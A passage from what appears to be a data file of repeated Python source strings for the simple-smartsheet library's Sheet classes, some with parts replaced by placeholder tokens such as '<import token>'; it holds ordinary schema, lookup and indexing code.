Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n\n def get_rows(self, filter: Dict[str, Any]) ->List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\n 'index'])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(Dict[Tuple[Any, ...], List[RowT]],\n index_dict['index'])\n return non_unique_index.get(query, [])\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where 
key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\nif TYPE_CHECKING:\n try:\n import pandas as pd\n except ImportError:\n pass\nlogger = logging.getLogger(__name__)\n\n\nclass UserSettingsSchema(Schema):\n critical_path_enabled = fields.Bool(data_key='criticalPathEnabled')\n display_summary_tasks = fields.Bool(data_key='displaySummaryTasks')\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass UserSettings(Object):\n critical_path_enabled: bool\n display_summary_tasks: bool\n\n\nclass UserPermissionsSchema(Schema):\n summary_permissions = fields.Str(data_key='summaryPermissions')\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass UserPermissions(Object):\n summary_permissions: str\n\n\nclass WorkspaceSchema(Schema):\n id = fields.Int()\n name = fields.Str()\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Workspace(Object):\n id: int\n name: str\n\n\nclass SheetSchema(CoreSchema):\n \"\"\"Marshmallow Schema for Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n \"\"\"\n id = fields.Int()\n name = fields.Str()\n access_level = fields.Str(data_key='accessLevel')\n permalink = fields.Str()\n favorite = fields.Bool()\n created_at = fields.DateTime(data_key='createdAt')\n modified_at = fields.DateTime(data_key='modifiedAt')\n version = fields.Int()\n total_row_count = fields.Int(data_key='totalRowCount')\n effective_attachment_options = fields.List(fields.Str(), data_key=\n 'effectiveAttachmentOptions')\n gantt_enabled = fields.Bool(data_key='ganttEnabled')\n read_only = fields.Bool(data_key='readOnly')\n dependencies_enabled = fields.Bool(data_key='dependenciesEnabled')\n resource_management_enabled = fields.Bool(data_key=\n 'resourceManagementEnabled')\n cell_image_upload_enabled = fields.Bool(data_key='cellImageUploadEnabled')\n user_settings = fields.Nested(UserSettingsSchema, data_key='userSettings')\n user_permissions = fields.Nested(UserPermissionsSchema, data_key=\n 'userPermissions')\n has_summary_fields = fields.Bool(data_key='hasSummaryFields')\n is_multi_picklist_enabled = fields.Bool(data_key='isMultiPicklistEnabled')\n columns = fields.List(fields.Nested(ColumnSchema))\n rows = fields.List(fields.Nested(RowSchema))\n workspace = fields.Nested(WorkspaceSchema)\n\n\n class Meta:\n unknown = utils.get_unknown_field_handling(config.STRICT_VALIDATION)\n ordered = True\n\n @pre_load\n def update_context(self, data, many: bool, **kwargs):\n self.context['column_id_to_type'] = {}\n return data\n\n\nRowT = TypeVar('RowT', bound=_RowBase[Any])\nColumnT = TypeVar('ColumnT', bound=Column)\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n \"\"\"Represents Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n Extra attributes:\n indexes: contains all built indices\n \"\"\"\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n 
cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n\n def get_rows(self, filter: Dict[str, Any]) ->List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. 
Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\n 'index'])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(Dict[Tuple[Any, ...], List[RowT]],\n index_dict['index'])\n return non_unique_index.get(query, [])\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\nif TYPE_CHECKING:\n try:\n import pandas as pd\n except ImportError:\n pass\n<assignment token>\n\n\nclass UserSettingsSchema(Schema):\n critical_path_enabled = fields.Bool(data_key='criticalPathEnabled')\n display_summary_tasks = fields.Bool(data_key='displaySummaryTasks')\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass UserSettings(Object):\n critical_path_enabled: bool\n display_summary_tasks: bool\n\n\nclass UserPermissionsSchema(Schema):\n summary_permissions = fields.Str(data_key='summaryPermissions')\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass UserPermissions(Object):\n summary_permissions: str\n\n\nclass WorkspaceSchema(Schema):\n id = fields.Int()\n name = fields.Str()\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Workspace(Object):\n id: int\n name: str\n\n\nclass SheetSchema(CoreSchema):\n \"\"\"Marshmallow Schema for Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n \"\"\"\n id = fields.Int()\n name = fields.Str()\n access_level = fields.Str(data_key='accessLevel')\n permalink = fields.Str()\n favorite = fields.Bool()\n created_at = fields.DateTime(data_key='createdAt')\n modified_at = fields.DateTime(data_key='modifiedAt')\n version = fields.Int()\n total_row_count = fields.Int(data_key='totalRowCount')\n effective_attachment_options = fields.List(fields.Str(), data_key=\n 'effectiveAttachmentOptions')\n gantt_enabled = fields.Bool(data_key='ganttEnabled')\n read_only = fields.Bool(data_key='readOnly')\n dependencies_enabled = fields.Bool(data_key='dependenciesEnabled')\n resource_management_enabled = fields.Bool(data_key=\n 'resourceManagementEnabled')\n cell_image_upload_enabled = fields.Bool(data_key='cellImageUploadEnabled')\n user_settings = fields.Nested(UserSettingsSchema, data_key='userSettings')\n user_permissions = fields.Nested(UserPermissionsSchema, data_key=\n 'userPermissions')\n has_summary_fields = fields.Bool(data_key='hasSummaryFields')\n is_multi_picklist_enabled = fields.Bool(data_key='isMultiPicklistEnabled')\n columns = fields.List(fields.Nested(ColumnSchema))\n rows = fields.List(fields.Nested(RowSchema))\n workspace = fields.Nested(WorkspaceSchema)\n\n\n class Meta:\n unknown = utils.get_unknown_field_handling(config.STRICT_VALIDATION)\n ordered = True\n\n @pre_load\n def update_context(self, data, many: bool, **kwargs):\n self.context['column_id_to_type'] = {}\n return data\n\n\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n \"\"\"Represents Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n Extra attributes:\n indexes: contains all built indices\n \"\"\"\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n 
user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n\n def get_rows(self, filter: Dict[str, Any]) ->List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. 
Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\n 'index'])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(Dict[Tuple[Any, ...], List[RowT]],\n index_dict['index'])\n return non_unique_index.get(query, [])\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
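get_column resolves a Column either by its case-sensitive title or by its numeric ID, and make_cell uses that lookup to bind a value to the right column, routing MULTI_PICKLIST columns through Cell.create_multi_picklist. A short sketch, with "Status" as a placeholder title and `sheet` as an existing Sheet instance:

# Placeholder column title; `sheet` is an already-loaded Sheet.
status_column = sheet.get_column("Status")                    # lookup by title
same_column = sheet.get_column(column_id=status_column.id)    # or by numeric ID

# Builds a Cell carrying the resolved column ID and the given value.
cell = sheet.make_cell("Status", "In Progress")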
"<import token>\n<code token>\n<assignment token>\n\n\nclass UserSettingsSchema(Schema):\n critical_path_enabled = fields.Bool(data_key='criticalPathEnabled')\n display_summary_tasks = fields.Bool(data_key='displaySummaryTasks')\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass UserSettings(Object):\n critical_path_enabled: bool\n display_summary_tasks: bool\n\n\nclass UserPermissionsSchema(Schema):\n summary_permissions = fields.Str(data_key='summaryPermissions')\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass UserPermissions(Object):\n summary_permissions: str\n\n\nclass WorkspaceSchema(Schema):\n id = fields.Int()\n name = fields.Str()\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Workspace(Object):\n id: int\n name: str\n\n\nclass SheetSchema(CoreSchema):\n \"\"\"Marshmallow Schema for Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n \"\"\"\n id = fields.Int()\n name = fields.Str()\n access_level = fields.Str(data_key='accessLevel')\n permalink = fields.Str()\n favorite = fields.Bool()\n created_at = fields.DateTime(data_key='createdAt')\n modified_at = fields.DateTime(data_key='modifiedAt')\n version = fields.Int()\n total_row_count = fields.Int(data_key='totalRowCount')\n effective_attachment_options = fields.List(fields.Str(), data_key=\n 'effectiveAttachmentOptions')\n gantt_enabled = fields.Bool(data_key='ganttEnabled')\n read_only = fields.Bool(data_key='readOnly')\n dependencies_enabled = fields.Bool(data_key='dependenciesEnabled')\n resource_management_enabled = fields.Bool(data_key=\n 'resourceManagementEnabled')\n cell_image_upload_enabled = fields.Bool(data_key='cellImageUploadEnabled')\n user_settings = fields.Nested(UserSettingsSchema, data_key='userSettings')\n user_permissions = fields.Nested(UserPermissionsSchema, data_key=\n 'userPermissions')\n has_summary_fields = fields.Bool(data_key='hasSummaryFields')\n is_multi_picklist_enabled = fields.Bool(data_key='isMultiPicklistEnabled')\n columns = fields.List(fields.Nested(ColumnSchema))\n rows = fields.List(fields.Nested(RowSchema))\n workspace = fields.Nested(WorkspaceSchema)\n\n\n class Meta:\n unknown = utils.get_unknown_field_handling(config.STRICT_VALIDATION)\n ordered = True\n\n @pre_load\n def update_context(self, data, many: bool, **kwargs):\n self.context['column_id_to_type'] = {}\n return data\n\n\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n \"\"\"Represents Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n Extra attributes:\n indexes: contains all built indices\n \"\"\"\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: 
Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n\n def get_rows(self, filter: Dict[str, Any]) ->List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. 
Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\n 'index'])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(Dict[Tuple[Any, ...], List[RowT]],\n index_dict['index'])\n return non_unique_index.get(query, [])\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == 